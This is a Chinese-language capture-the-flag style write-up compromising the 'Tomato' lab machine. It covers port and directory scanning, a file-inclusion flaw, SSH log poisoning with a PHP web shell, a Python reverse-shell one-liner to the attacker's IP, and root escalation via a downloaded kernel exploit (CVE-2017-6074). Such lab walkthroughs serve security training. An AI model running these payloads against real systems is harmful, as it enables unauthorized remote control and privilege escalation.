Tomato-靶机(文件包含漏洞)

发布于 2022-04-01  304 次阅读


信息收集

扫描存活主机确定靶场ip

arp-scan -l
或
nmap -sP 192.168.226.0/24

image-20220331225511800

扫描目标主机开放的端口

nmap -sS -sV -p- -v 192.168.226.128

image-20220331225436113

漏洞发现

访问web服务

image-20220331225636145

未曾发现有用信息

网站目录扫描

dirb http://192.168.226.133
或
python3 dirsearch.py -u 192.168.226.133 -e*

image-20220401111819590

第二种方式未能探测出有效目录

image-20220401111726322

访问antibot_image发现存在目录遍历

image-20220401112106863

发现info.php是phpinfo的界面

image-20220401112140567
image-20220401112200083

查看页面源代码发现一串文件包含的代码

image-20220401112259828

http://192.168.226.133/antibot_image/antibots/info.php?image=/etc/passwd

image-20220401112504260

可以读取出passwd文件的内容

漏洞利用

尝试文件包含被污染的SSH日志来getshell

ssh '<?php system($_GET['cmd']); ?>'@192.168.226.133 -p2211

image-20220401113105319

这样<?php system($_GET['cmd']); ?>该用户就会被记录到ssh的日志中去

ssh日志在/var/log/auth.log

开启nc监听

nc -lvnp 3388

查看目标主机有没有安装python

view-source:http://192.168.226.133/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=whereis python

image-20220401125910910

可以看到目标靶机安装了python3,那就可以利用python进行反弹了

view-source:http://192.168.226.133/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.226.128",3388));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

成功反弹shell

image-20220401130102991

权限提升

查看操作系统内核

image-20220401130403061

建立可交互式shell

image-20220401133007522

在网上查看对应的exp

git clone https://github.com/kkamagui/linux-kernel-exploits.git

下载攻击代码,进入linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074目录,运行compile.sh文件

image-20220401132504088

查看生成的exp

image-20220401132551891

使用python开启一个临时http服务器

image-20220401132645112

靶机切换到tmp目录下,下载exp,并给予执行的权限

image-20220401133431132

运行文件,提升权限

image-20220401133550158

成功拿到root权限

Daniel_WRF
最后更新于 2022-04-07